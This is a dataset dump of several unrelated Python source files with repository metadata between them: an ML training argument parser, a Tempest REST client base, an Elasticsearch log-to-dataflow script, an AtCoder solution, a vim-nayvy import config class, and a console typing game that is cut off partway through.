def read_config(config_path):
with open(config_path, 'r') as f:
cfg = yaml.load(f.read(), Loader=yaml.FullLoader)
return cfg or {}
def parse_config(cfg_name, cfg):
# Parse the name of config file
sp = splitext(cfg_name)[0].split('_')
if len(sp) >= 2:
cfg.setdefault('tag', sp[1])
cfg.setdefault('suffix', '_'.join(sp[2:]))
return cfg
def parse_args():
# Training settings
parser = argparse.ArgumentParser()
parser.add_argument('cmd', choices=['train', 'val'])
# Data
# Common
group_data = parser.add_argument_group('data')
group_data.add_argument('-d', '--dataset', type=str, default='OSCD')
group_data.add_argument('-p', '--crop-size', type=int, default=256, metavar='P',
help='patch size (default: %(default)s)')
group_data.add_argument('--num-workers', type=int, default=8)
group_data.add_argument('--repeats', type=int, default=100)
# Optimizer
group_optim = parser.add_argument_group('optimizer')
group_optim.add_argument('--optimizer', type=str, default='Adam')
group_optim.add_argument('--lr', type=float, default=1e-4, metavar='LR',
help='learning rate (default: %(default)s)')
group_optim.add_argument('--lr-mode', type=str, default='const')
group_optim.add_argument('--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: %(default)s)')
group_optim.add_argument('--step', type=int, default=200)
# Training related
group_train = parser.add_argument_group('training related')
group_train.add_argument('--batch-size', type=int, default=8, metavar='B',
help='input batch size for training (default: %(default)s)')
group_train.add_argument('--num-epochs', type=int, default=1000, metavar='NE',
help='number of epochs to train (default: %(default)s)')
group_train.add_argument('--load-optim', action='store_true')
group_train.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint')
group_train.add_argument('--anew', action='store_true',
help='clear history and start from epoch 0 with the checkpoint loaded')
group_train.add_argument('--trace-freq', type=int, default=50)
group_train.add_argument('--device', type=str, default='cpu')
group_train.add_argument('--metrics', type=str, default='F1Score+Accuracy+Recall+Precision')
# Experiment
group_exp = parser.add_argument_group('experiment related')
group_exp.add_argument('--exp-dir', default='../exp/')
group_exp.add_argument('-o', '--out-dir', default='')
group_exp.add_argument('--tag', type=str, default='')
group_exp.add_argument('--suffix', type=str, default='')
group_exp.add_argument('--exp-config', type=str, default='')
group_exp.add_argument('--save-on', action='store_true')
group_exp.add_argument('--log-off', action='store_true')
group_exp.add_argument('--suffix-off', action='store_true')
# Criterion
group_critn = parser.add_argument_group('criterion related')
group_critn.add_argument('--criterion', type=str, default='NLL')
group_critn.add_argument('--weights', type=str, default=(1.0, 1.0))
# Model
group_model = parser.add_argument_group('model')
group_model.add_argument('--model', type=str, default='siamunet_conc')
group_model.add_argument('--num-feats-in', type=int, default=13)
args = parser.parse_args()
if exists(args.exp_config):
cfg = read_config(args.exp_config)
cfg = parse_config(basename(args.exp_config), cfg)
# Settings from cfg file overwrite those in args
# Note that the non-default values will not be affected
parser.set_defaults(**cfg) # Reset part of the default values
args = parser.parse_args() # Parse again
# Handle args.weights
if isinstance(args.weights, str):
args.weights = ast.literal_eval(args.weights)
args.weights = tuple(args.weights)
return args
def set_gpc_and_logger(args):
gpc = OutPathGetter(
root=os.path.join(args.exp_dir, args.tag),
suffix=args.suffix)
log_dir = '' if args.log_off else gpc.get_dir('log')
logger = Logger(
scrn=True,
log_dir=log_dir,
phase=args.cmd
)
register('GPC', gpc)
register('LOGGER', logger)
return gpc, logger
def main():
args = parse_args()
gpc, logger = set_gpc_and_logger(args)
if args.exp_config:
# Make a copy of the config file
cfg_path = gpc.get_path('root', basename(args.exp_config), suffix=False)
shutil.copy(args.exp_config, cfg_path)
# Set random seed
RNG_SEED = 1
random.seed(RNG_SEED)
np.random.seed(RNG_SEED)
torch.manual_seed(RNG_SEED)
cudnn.deterministic = True
cudnn.benchmark = False
try:
trainer = CDTrainer(args.model, args.dataset, args.optimizer, args)
trainer.run()
except BaseException as e:
import traceback
# Catch ALL kinds of exceptions
logger.fatal(traceback.format_exc())
exit(1)
if __name__ == '__main__':
main() | 5,113 | 0 | 115 |
352bffccb5db695de7720978c4141cbd2aadc397 | 1,464 | py | Python | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 1 | 2019-04-29T09:00:16.000Z | 2019-04-29T09:00:16.000Z | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 11 | 2018-12-04T14:20:27.000Z | 2019-05-30T14:37:13.000Z | tungsten_tempest_plugin/services/contrail/json/base.py | Vegasq/tungsten-tempest | 624584cd1a2298b92a44223de1ca7ae23c6f3476 | [
"Apache-2.0"
] | 9 | 2018-07-26T18:20:45.000Z | 2020-03-27T17:40:56.000Z | # Copyright 2016 AT&T Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base service class for all service classes
"""
from oslo_log import log as logging
from tempest.lib.common import rest_client
LOG = logging.getLogger(__name__)
class BaseContrailClient(rest_client.RestClient):
"""Base Tempest REST client for Designate API"""
class ResponseBody(dict):
"""Class that wraps an http response and dict body into a single value.
Callers that receive this object will normally use it as a dict but
can extract the response if needed.
"""
| 31.826087 | 78 | 0.704918 | # Copyright 2016 AT&T Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base service class for all service classes
"""
from oslo_log import log as logging
from tempest.lib.common import rest_client
LOG = logging.getLogger(__name__)
class BaseContrailClient(rest_client.RestClient):
"""Base Tempest REST client for Designate API"""
class ResponseBody(dict):
"""Class that wraps an http response and dict body into a single value.
Callers that receive this object will normally use it as a dict but
can extract the response if needed.
"""
def __init__(self, response, body=None, **kwargs):
super(ResponseBody, self).__init__(**kwargs)
body_data = body or {}
self.update(body_data)
self.response = response
def __str__(self):
body = super(ResponseBody, self).__str__()
return "response: %s\nBody: %s" % (self.response, body)
| 289 | 0 | 54 |
8f7bd584acc1126e963ba497f2eade43c2467a35 | 9,519 | py | Python | sources/elasticsearch/logs2dataflow.py | macbre/database-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
] | 20 | 2017-07-04T05:32:19.000Z | 2021-10-20T22:40:33.000Z | sources/elasticsearch/logs2dataflow.py | macbre/data-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
] | 15 | 2017-06-09T20:12:36.000Z | 2019-01-18T18:40:21.000Z | sources/elasticsearch/logs2dataflow.py | macbre/database-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
] | 5 | 2018-10-19T06:48:48.000Z | 2021-08-19T08:12:29.000Z | #!/usr/bin/env python2
"""
This script demonstates how to transform SQL logs fetched from elasticsearch into graph showing how data flows between the code and the storage
"""
from __future__ import print_function
import collections
import time
import logging
import re
from datetime import datetime
from dateutil import tz
import sqlparse
from elasticsearch import Elasticsearch
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-35s %(levelname)-8s %(message)s',
datefmt="%Y-%m-%d %H:%M:%S"
)
logger = logging.getLogger(__name__)
def format_timestamp(ts):
"""
Format the UTC timestamp for Elasticsearch
eg. 2014-07-09T08:37:18.000Z
@see https://docs.python.org/2/library/time.html#time.strftime
"""
tz_info = tz.tzutc()
return datetime.fromtimestamp(ts, tz=tz_info).strftime("%Y-%m-%dT%H:%M:%S.000Z")
# take SQL logs from elasticsearch
sql_logs = get_log_messages(query='@message: /SQL.*/', limit=None) # None - return ALL matching messages
logger.info('Generating metadata...')
meta = map(extract_metadata, sql_logs)
meta = filter(lambda item: item is not None, meta)
logger.info('Building dataflow entries for {} queries...'.format(len(meta)))
entries = map(build_flow_entry, meta)
logger.info('Building TSV file with nodes and edges from {} entries...'.format(len(entries)))
graph = unique(
lambda entry, cnt: 'QPS: {:.4f}'.format(1. * cnt / 86400), # calculate QPS
entries
)
logger.info('Printing out TSV file with {} edges...'.format(len(graph)))
print('# SQL log entries analyzed: {}'.format(len(meta)))
print("\n".join(set(graph)))
# prepare flow data for redis operations
logger.info("Building dataflow entries for redis pushes...")
pushes = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='bots:{}'.format(entry.get('@source_host').split('.')[0]), edge='push', target='redis:products'),
get_log_messages(query='program: "elecena.bots" AND @message: "bot::send"',limit=None)
)
pops = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
target='mq/request.php', edge='pop', source='redis:products'),
get_log_messages(query='program: "uportal.bots-worker" AND @message: "Message taken from the queue"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} messages/hour'.format(1. * cnt / 24),
pops + pushes
)
print('# Redis log entries')
print("\n".join(set(graph)))
# prepare HTTP traffic stats for bots
logger.info("Building dataflow entries for bots HTTP traffic...")
hosts_buckets, bytes_transfered = get_log_aggregate(
query='program: "elecena.bots" AND @message: "bot::send_http_request" AND severity: "info"',
group_by='@source_host', stats_field='@context.stats.size_download'
)
graph = []
max_count = max(hosts_buckets.values())
bytes_per_req = 1. * bytes_transfered['sum'] / bytes_transfered['count']
for host, count in hosts_buckets.iteritems():
graph.append('{source}\t{edge}\t{target}\t{value:.4f}\t{metadata}'.format(
source='web:shops', edge='http fetch', target='bots:{}'.format(host), value=1.0 * count / max_count,
metadata='{reqs:.0f} requests/hour, {gibs:.2f} GiB/hour'.format(reqs=1. * count / 24, gibs=bytes_per_req * count / 1024 / 1024 / 1024 / 24)
))
print('# bots HTTP traffic')
print("\n".join(set(graph)))
# prepare flow data for s3 operations
logger.info("Building dataflow entries for s3 operations...")
s3_uploads = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='ImageBot', edge='upload', target='s3:s.elecena.pl'),
get_log_messages(query='program: "nano.ImageBot" AND @message: "Image stored"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} requests/hour'.format(1. * cnt / 24),
s3_uploads
)
print('# s3 operations')
print("\n".join(set(graph)))
| 28.330357 | 143 | 0.668768 | #!/usr/bin/env python2
"""
This script demonstates how to transform SQL logs fetched from elasticsearch into graph showing how data flows between the code and the storage
"""
from __future__ import print_function
import collections
import time
import logging
import re
from datetime import datetime
from dateutil import tz
import sqlparse
from elasticsearch import Elasticsearch
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-35s %(levelname)-8s %(message)s',
datefmt="%Y-%m-%d %H:%M:%S"
)
logger = logging.getLogger(__name__)
def format_index_name(ts, prefix='syslog-ng_'):
tz_info = tz.tzutc()
# e.g. syslog-ng_2017-06-03
return "{prefix}{date}".format(prefix=prefix, date=datetime.fromtimestamp(ts, tz=tz_info).strftime('%Y-%m-%d'))
def es_get_timestamp_filer(since=None):
# @see https://www.elastic.co/guide/en/elasticsearch/reference/2.3/query-dsl-range-query.html
return {
"range": {
"@timestamp": {
"gt": since,
}
}
} if since is not None else {}
def format_timestamp(ts):
"""
Format the UTC timestamp for Elasticsearch
eg. 2014-07-09T08:37:18.000Z
@see https://docs.python.org/2/library/time.html#time.strftime
"""
tz_info = tz.tzutc()
return datetime.fromtimestamp(ts, tz=tz_info).strftime("%Y-%m-%dT%H:%M:%S.000Z")
def get_log_messages(query, extra=None, now=None, limit=10000, batch=10000, return_raw=False):
logger = logging.getLogger('get_log_messages')
# connect to es
es = Elasticsearch(host='127.0.0.1', port=59200, timeout=120)
# take logs from the last day and today (last 24h)
if now is None:
now = int(time.time())
indices = ','.join([
format_index_name(now - 86400),
format_index_name(now)
])
# search
body = {
"query": {
"query_string": {
"query": query,
}
},
"size": batch,
"sort": { "@timestamp": { "order": "asc" }}
}
if extra is not None:
body.update(extra)
items = 0
since = format_timestamp(now-86400)
logger.info('Querying for "{}" since {} (limit set to {}, will query in batches of {} items)'.format(query, since, limit, batch))
while limit is None or items <= limit:
body["filter"] = es_get_timestamp_filer(since)
res = es.search(index=indices, body=body)
if return_raw is True:
yield res
return
# logger.info('search: {}'.format(body))
# logger.info('got {} results'.format(res['hits']['total']))
cnt = len(res['hits']['hits'])
# logger.info('Got {} results'.format(cnt))
if cnt == 0:
logger.info('No more results, returned {} results so far'.format(items))
return
# yield results one by one
for hit in res['hits']['hits']:
items += 1
since = hit['_source']['@timestamp']
yield hit['_source']
logger.info('Next time will query for logs since {}'.format(since))
logger.info('Limit of {} results reached, returned {} results so far'.format(limit, items))
def get_log_aggregate(query, group_by, stats_field):
# @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations.html
# @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations-metrics-stats-aggregation.html
# @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations-bucket-terms-aggregation.html
aggs = {
"aggregations": {
"group_by_agg": {
"terms": {
"field": group_by
},
},
"aggregations": {
"stats" : { "field" : stats_field }
}
}
}
res = get_log_messages(query, extra=aggs, limit=0, batch=0, return_raw=True)
res = list(res)[0]
aggs = res['aggregations']
# print(aggs)
# build stats
buckets = {}
for agg in aggs['group_by_agg']['buckets']:
buckets[agg['key']] = agg['doc_count']
stats = aggs['aggregations']
return buckets, stats
def get_query_metadata(query):
# @see https://pypi.python.org/pypi/sqlparse
res = None # sqlparse.parse(query)
if res:
statement = res[0]
sql_type = statement.get_type() # SELECT, UPDATE, UNKNOWN
tables = filter(lambda token: isinstance(token, sqlparse.sql.Identifier), statement.tokens)
tables = map(str, tables)
print(query[:90], sql_type, tables)
if sql_type != 'UNKNOWN':
return sql_type, tables # SELECT, (products, )
kind = query.split(' ')[0]
try:
# SELECT FROM, INSERT INTO
matches = re.search(r'(FROM|INTO) (\w+)', query)
return (kind, (matches.group(2),))
except:
pass
try:
# UPDATE foo SET ...
matches = re.search(r'(\w+) SET', query) if 'UPDATE' in query else None
return (kind, (matches.group(1),))
except:
pass
try:
# DESCRIBE foo
matches = re.search(r'DESCRIBE (\w+)', query)
return (kind, (matches.group(1),))
except:
pass
return None
def extract_metadata(message):
query = re.sub(r'^SQL ', '', message.get('@message'))
meta = get_query_metadata(query)
if meta is None:
# logger.info('extract_metadata failed: {} - {}'.format(query[:120].encode('utf8'), meta));
return None
(kind, table) = meta
table = table[0] # TODO: handle more tables
# sphinx or mysql?
db = message.get('@fields').get('database').get('name')
# code method
try:
# legacy DB logger
method = message.get('@context').get('exception').get('trace')[-2] # /opt/elecena/backend/mq/request.php:421
method = '/'.join(method.split('/')[-2:]) # mq/request.php:53
method = '{}::_{}'.format(method.split(':')[0], kind.lower()) # mq/request.php
except AttributeError:
method = message.get('@context').get('method') # Elecena\Services\Sphinx::search
if '::' not in method:
method = method + '::_'
return dict(
db=db if db == 'sphinx' else 'mysql',
kind=kind, # SELECT
table=table, # products
method=method,
web_request='http_method' in message.get('@fields', {})
)
def build_flow_entry(meta):
table = '{}:{}'.format(meta.get('db'),meta.get('table'))
(cls, edge) = meta.get('method').split('::')
reads = meta.get('kind') not in ['INSERT', 'UPDATE', 'DELETE']
# code -> method -> DB table (if the code writes to DB)
# DB -> method -> code (if the code reads to DB)
return "{source}\t{edge}\t{target}".format(
source=table if reads else cls,
edge=edge,
target=cls if reads else table
)
def unique(fn, iterable):
# for stats and weighting entries
c = collections.Counter(iterable)
max_value = c.most_common(1)[0][1]
def format_item(item):
cnt = c[item]
weight = 1. * cnt / max_value
if weight < 0.0001:
weight = 0.0001
metadata = fn(item, cnt) if fn else ''
return item + "\t{:.4f}\t{}".format(weight, metadata).rstrip()
return sorted(map(format_item, iterable))
# take SQL logs from elasticsearch
sql_logs = get_log_messages(query='@message: /SQL.*/', limit=None) # None - return ALL matching messages
logger.info('Generating metadata...')
meta = map(extract_metadata, sql_logs)
meta = filter(lambda item: item is not None, meta)
logger.info('Building dataflow entries for {} queries...'.format(len(meta)))
entries = map(build_flow_entry, meta)
logger.info('Building TSV file with nodes and edges from {} entries...'.format(len(entries)))
graph = unique(
lambda entry, cnt: 'QPS: {:.4f}'.format(1. * cnt / 86400), # calculate QPS
entries
)
logger.info('Printing out TSV file with {} edges...'.format(len(graph)))
print('# SQL log entries analyzed: {}'.format(len(meta)))
print("\n".join(set(graph)))
# prepare flow data for redis operations
logger.info("Building dataflow entries for redis pushes...")
pushes = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='bots:{}'.format(entry.get('@source_host').split('.')[0]), edge='push', target='redis:products'),
get_log_messages(query='program: "elecena.bots" AND @message: "bot::send"',limit=None)
)
pops = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
target='mq/request.php', edge='pop', source='redis:products'),
get_log_messages(query='program: "uportal.bots-worker" AND @message: "Message taken from the queue"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} messages/hour'.format(1. * cnt / 24),
pops + pushes
)
print('# Redis log entries')
print("\n".join(set(graph)))
# prepare HTTP traffic stats for bots
logger.info("Building dataflow entries for bots HTTP traffic...")
hosts_buckets, bytes_transfered = get_log_aggregate(
query='program: "elecena.bots" AND @message: "bot::send_http_request" AND severity: "info"',
group_by='@source_host', stats_field='@context.stats.size_download'
)
graph = []
max_count = max(hosts_buckets.values())
bytes_per_req = 1. * bytes_transfered['sum'] / bytes_transfered['count']
for host, count in hosts_buckets.iteritems():
graph.append('{source}\t{edge}\t{target}\t{value:.4f}\t{metadata}'.format(
source='web:shops', edge='http fetch', target='bots:{}'.format(host), value=1.0 * count / max_count,
metadata='{reqs:.0f} requests/hour, {gibs:.2f} GiB/hour'.format(reqs=1. * count / 24, gibs=bytes_per_req * count / 1024 / 1024 / 1024 / 24)
))
print('# bots HTTP traffic')
print("\n".join(set(graph)))
# prepare flow data for s3 operations
logger.info("Building dataflow entries for s3 operations...")
s3_uploads = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='ImageBot', edge='upload', target='s3:s.elecena.pl'),
get_log_messages(query='program: "nano.ImageBot" AND @message: "Image stored"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} requests/hour'.format(1. * cnt / 24),
s3_uploads
)
print('# s3 operations')
print("\n".join(set(graph)))
| 5,563 | 0 | 184 |
4505f7a728be18b57ebab98df1bcdb9e544919d8 | 148 | py | Python | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | a = int(input())
b = int(input())
n = int(input())
for i in range(n, int(10e9)):
if (i % a == 0 and i % b == 0):
print(i)
break
| 18.5 | 35 | 0.459459 | a = int(input())
b = int(input())
n = int(input())
for i in range(n, int(10e9)):
if (i % a == 0 and i % b == 0):
print(i)
break
| 0 | 0 | 0 |
8556a7209add99c3013666af795f0b26a16e21c9 | 3,451 | py | Python | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 68 | 2020-03-17T07:36:42.000Z | 2022-02-18T13:21:22.000Z | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 2 | 2020-03-17T06:52:44.000Z | 2021-01-03T06:45:13.000Z | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 5 | 2020-03-17T07:42:23.000Z | 2022-01-02T23:02:36.000Z | import os
from typing import Any, Dict, List, Tuple, Optional, Generator
from os.path import dirname, expandvars
from pathlib import Path
from .fixer import ImportStatementMap
from .import_statement import SingleImport, ImportStatement
| 32.866667 | 83 | 0.572877 | import os
from typing import Any, Dict, List, Tuple, Optional, Generator
from os.path import dirname, expandvars
from pathlib import Path
from .fixer import ImportStatementMap
from .import_statement import SingleImport, ImportStatement
class ImportConfig(ImportStatementMap):
@property
def import_d(self) -> Dict[str, SingleImport]:
return self._import_d
def __init__(self, import_d: Dict[str, SingleImport]) -> None:
self._import_d = import_d
return
def __getitem__(self, name: str) -> Optional[SingleImport]:
return self._import_d.get(name, None)
def items(self) -> Generator[Tuple[str, SingleImport], Any, Any]:
for k, v in self._import_d.items():
yield (k, v)
@classmethod
def init(
cls,
import_config_path: str = '',
) -> Optional['ImportConfig']:
if import_config_path:
nayvy_import_config_path = expandvars(import_config_path)
else:
xdg_root = os.getenv(
'XDG_CONFIG_HOME',
'{}/.config'.format(
os.environ['HOME']
)
)
nayvy_import_config_path = '{}/nayvy/import_config.nayvy'.format(
xdg_root,
)
custom_config = cls._of_config_py(nayvy_import_config_path)
if custom_config is not None:
return custom_config
return cls._of_default()
@classmethod
def _of_lines(cls, lines: List[str]) -> Optional['ImportConfig']:
""" Construct nayvy import object from lines (content of nayvy config file)
"""
blocks: List[List[str]] = []
tmp_block: List[str] = []
for line in lines:
if line.strip() == '':
blocks.append(tmp_block)
tmp_block = []
else:
tmp_block.append(line.strip())
if tmp_block:
blocks.append(tmp_block)
import_d: Dict[str, SingleImport] = {}
for block_i, block in enumerate(blocks):
import_statements = ImportStatement.of_lines(block)
if import_statements is None:
return None
for import_statement in import_statements:
for import_as_part in import_statement.import_as_parts:
single_import = SingleImport(
import_as_part.name,
import_statement.get_single_statement(
import_as_part,
),
block_i,
)
import_d[single_import.name] = single_import
return ImportConfig(import_d)
@classmethod
def _of_default(cls) -> Optional['ImportConfig']:
"""
Construct ImportConfig object using default nayvy configuration
prepared in a project.
"""
path = str(
Path(dirname(__file__)) /
'default_import_config.nayvy'
)
with open(path) as f:
lines = f.readlines()
return cls._of_lines(lines)
@classmethod
def _of_config_py(cls, config_path: str) -> Optional['ImportConfig']:
""" Construct nayvy import config from a given path.
"""
if not os.path.exists(config_path):
return None
with open(config_path) as f:
lines = f.readlines()
return cls._of_lines(lines)
| 998 | 2,192 | 23 |
371e2fd7e71a095bf5951efd01480406a7c08a39 | 12,876 | py | Python | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 3 | 2021-05-09T10:56:39.000Z | 2022-03-16T21:51:43.000Z | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 1 | 2021-04-27T17:37:47.000Z | 2021-04-27T17:38:02.000Z | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 1 | 2022-02-15T14:25:12.000Z | 2022-02-15T14:25:12.000Z | #!/usr/bin/env python3
import argparse
import collections
import curses
import os
import random
import sys
import time
import pkg_resources
from multiprocessing import Array, Event, Process, Value
import numpy as np
import pandas as pd
if __name__ == "__main__":
main()
| 35.373626 | 92 | 0.561432 | #!/usr/bin/env python3
import argparse
import collections
import curses
import os
import random
import sys
import time
import pkg_resources
from multiprocessing import Array, Event, Process, Value
import numpy as np
import pandas as pd
def main():
parser = argparse.ArgumentParser(description='Typing game on console')
parser.add_argument('-t', '--time', default=60,
help='Practice time (sec.)', type=int)
parser.add_argument('-p', '--path', default='None',
help='Path to training file')
parser.add_argument('-f', '--file', default='None',
help='Training filename')
parser.add_argument('-l', '--logfile', default='typro_results.csv',
help='Log filename')
parser.add_argument('-m', '--logpath', default='None',
help='Path to log file')
parser.add_argument('-u', '--user', default='user', help='User name')
parser.add_argument('-q', '--quiet', action='store_false',
help='Run without log')
parser.add_argument('-o', '--order', action='store_true',
help='Not shuffle the training data')
parser.add_argument('-r', '--ranking', action='store_true',
help='Show ranking')
parser.add_argument('-s', '--summary', action='store_true',
help='Show user summary')
parser.add_argument('-d', '--date', default=7,
help='Date to collect data', type=int)
parser.add_argument('-i', '--list', action='store_true',
help='Display lists of training file included')
args = parser.parse_args()
training_list, path, filename, logpathfile = make_trainings(args)
if args.list:
print('Predefined training file (e.g., typro -f cmd)')
print(pkg_resources.resource_listdir('typro', 'data'))
return 0
timeout_msec = args.time * 1000
delta_time_msec = 200
if args.user == 'user':
for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):
user = os.environ.get(name)
if user:
break
else:
user = args.user
if args.ranking:
show_ranking(logpathfile, args.date)
return 0
if args.summary:
show_summary(logpathfile, user, args.date)
return 0
start_event = Event()
timeout_event = Event()
time_msec = Value('i', 0)
mistake_char_list_as_int = Array('i', [-1]*1000)
n_correct = Value('i', 0)
timer_process = Process(target=timer,
args=(start_event, timeout_event,
timeout_msec, time_msec))
timer_process.start()
input_process = Process(target=load_input,
args=(start_event, timeout_event,
timeout_msec, time_msec,
delta_time_msec,
mistake_char_list_as_int,
n_correct, training_list))
input_process.start()
input_process.join()
mistake_char_list = [chr(c) for c in mistake_char_list_as_int if c > 0]
mistake_char_list_as_int = [c for c in mistake_char_list_as_int if c > 0]
if time_msec.value > 0:
print('User : ' + user)
print('Correct types : ' + str(n_correct.value))
print('Speed : ' +
'{:.1f} types/sec'.format(n_correct.value/time_msec.value*1000))
if args.quiet and n_correct.value:
if not os.path.isfile(logpathfile):
with open(logpathfile, mode='a') as f:
f.write('user,timestamp,time,correct,speed,file' +
"".join([','+str(i) for i
in np.arange(33, 127).tolist()])
+ '\n')
with open(logpathfile, mode='a') as f:
write_str = user + ',' + str(int(time.time()))\
+ ',' + str(time_msec.value/1000) + ','\
+ str(int(n_correct.value)) + ','\
+ str(n_correct.value/time_msec.value*1000.)\
+ ',' + filename
mistake_array = np.zeros(94)
for char_int in mistake_char_list_as_int:
mistake_array[char_int-33] += 1
write_str += "".join([','+str(int(n)) for n in mistake_array])
write_str += '\n'
f.write(write_str)
return 0
def make_bar(window_y_size, timeout_msec, time_msec):
bar_size = window_y_size - 17 # Space to show time
progress_percentage = time_msec.value / timeout_msec
shape_length = int(bar_size * progress_percentage)
under_length = int(bar_size - shape_length)
bar_str = '[' + '#'*shape_length + '_'*under_length + ']'
bar_str += ' {:.1f}/{:.0f} sec.'.format(time_msec.value/1000, timeout_msec/1000)
return bar_str
def point_mistake(correct, char_list):
mistake_str = ' '
for i in range(len(correct)):
if len(correct) <= i or len(char_list) <= i:
mistake_str += ' '
elif correct[i] == char_list[i]:
mistake_str += ' '
else:
mistake_str += '^'
return mistake_str
def load_input(start_event, timeout_event, timeout_msec,
time_msec, delta_time_msec,
mistake_char_list_as_int, n_correct, training_list):
stdscr = curses.initscr()
curses.noecho()
curses.curs_set(0)
curses.raw()
curses.cbreak()
stdscr.keypad(True)
stdscr.timeout(-1)
practice_type = training_list
index_practice = 0
char_list = []
window_y_size = stdscr.getmaxyx()[1]
number_of_mistake = 0
mistake_char_list = []
stdscr.clear()
sp0 = " _ "
sp1 = "| |_ _ _ _ __ _ __ ___ "
sp2 = "| __| | | | '_ \| '__/ _ \ "
sp3 = "| |_| |_| | |_) | | | (_) |"
sp4 = " \__|\__, | .__/|_| \___/ "
sp5 = " |___/|_| "
stdscr.addstr(0, 0, sp0)
stdscr.addstr(1, 0, sp1)
stdscr.addstr(2, 0, sp2 + ' Press any keys to start')
stdscr.addstr(3, 0, sp3 +
' Training time {:.0f} sec.'.format(timeout_msec/1000))
stdscr.addstr(4, 0, sp4)
stdscr.addstr(5, 0, sp5)
stdscr.refresh()
c = stdscr.getch()
if c == 27 or c == 113: # escape key or q
timeout_event.set()
start_event.set()
stdscr.timeout(int(delta_time_msec))
while not timeout_event.is_set():
stdscr.clear()
stdscr.addstr(0, 0, make_bar(window_y_size, timeout_msec, time_msec))
stdscr.addstr(2, 0, 'Type This : %s' % "".join(practice_type[index_practice]))
stdscr.addstr(3, 0, 'Your type : %s' % "".join(char_list) + '_')
stdscr.addstr(4, 0, point_mistake(practice_type[index_practice], char_list))
# stdscr.addstr(5, 0, str(n_correct.value))
# stdscr.addstr(6, 0, ''.join(mistake_char_list))
stdscr.refresh()
# stdscr.noutrefresh()
# curses.doupdate()
c = stdscr.getch()
if c != -1: # Find key type
if c == 27: # escape key
timeout_event.set()
elif c == 263 or c == 127 or c == 8: # Backspace/Ctrl-H
if len(char_list) > 0:
if "".join(char_list) != practice_type[index_practice][:len(char_list)]:
del char_list[-1]
elif c == 10: # Enter/Return
if "".join(char_list) == practice_type[index_practice]:
index_practice += 1
char_list = []
if index_practice >= len(practice_type):
timeout_event.set()
elif c == curses.KEY_RIGHT or c == curses.KEY_LEFT:
pass
elif c == curses.KEY_UP or c == curses.KEY_DOWN:
pass
elif c == 21: # Ctrl-U
if "".join(char_list) != practice_type[index_practice][:len(char_list)]:
char_list = []
else:
char_list.append(chr(c))
if len(practice_type[index_practice]) < len(char_list):
pass
elif char_list[-1] == practice_type[index_practice][len(char_list)-1]:
if "".join(char_list) == practice_type[index_practice][:len(char_list)]:
n_correct.value += 1
else:
correct_char = practice_type[index_practice][len(char_list)-1]
mistake_char_list_as_int[number_of_mistake] = ord(correct_char)
number_of_mistake += 1
mistake_char_list.append(correct_char)
stdscr.keypad(False)
curses.curs_set(1)
curses.nocbreak()
curses.noecho()
curses.endwin()
def timer(start_event, timeout_event, timeout_msec, time_msec):
while not start_event.is_set():
time.sleep(0.001)
ut_start = time.time()
while time_msec.value < timeout_msec and not timeout_event.is_set():
time.sleep(0.001) # wait in sec
